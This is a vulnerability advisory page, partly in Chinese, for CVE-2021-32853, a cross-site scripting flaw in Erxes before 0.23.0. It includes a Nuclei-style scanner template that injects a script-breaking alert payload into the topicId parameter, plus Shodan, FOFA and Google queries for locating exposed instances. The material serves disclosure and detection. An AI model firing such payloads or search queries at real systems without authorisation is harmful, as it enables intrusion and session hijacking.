CVE-2021-32853: Erxes <0.23.0 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Erxes | POC: 已公开

漏洞描述

Erxes before 0.23.0 contains a cross-site scripting vulnerability. The value of topicID parameter is not escaped and is triggered in the enclosing script tag.

PoC代码[已公开]

id: CVE-2021-32853

info:
  name: Erxes <0.23.0 - Cross-Site Scripting
  author: dwisiswant0
  severity: critical
  description: Erxes before 0.23.0 contains a cross-site scripting vulnerability. The value of topicID parameter is not escaped and is triggered in the enclosing script tag.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to Erxes version 0.23.0 or later to mitigate the vulnerability.
  reference:
    - https://securitylab.github.com/advisories/GHSL-2021-103-erxes/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3285
    - https://github.com/erxes/erxes/blob/f131b49add72032650d483f044d00658908aaf4a/widgets/server/views/widget.ejs#L14
    - https://github.com/erxes/erxes/blob/f131b49add72032650d483f044d00658908aaf4a/widgets/server/index.ts#L54
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
    cvss-score: 9.6
    cve-id: CVE-2021-32853
    cwe-id: CWE-79
    epss-score: 0.85495
    epss-percentile: 0.99328
    cpe: cpe:2.3:a:erxes:erxes:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: erxes
    product: erxes
    shodan-query: http.title:"erxes"
    fofa-query: title="erxes"
    google-query: intitle:"erxes"
  tags: cve2021,cve,xss,erxes,oss

http:
  - method: GET
    path:
      - "{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'topic_id: "</script><script>alert(document.domain)</script>'
          - "window.erxesEnv"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022047ccc1a763c240a31298642ecf195991ed1bd63a75834932901117cbbb1b3615022100c4dc3c5a41ab7f427238401153c581d139c078ce5a7f98a196e04fa47fb67c8e:922c64590222798bb761d5b6d8e72950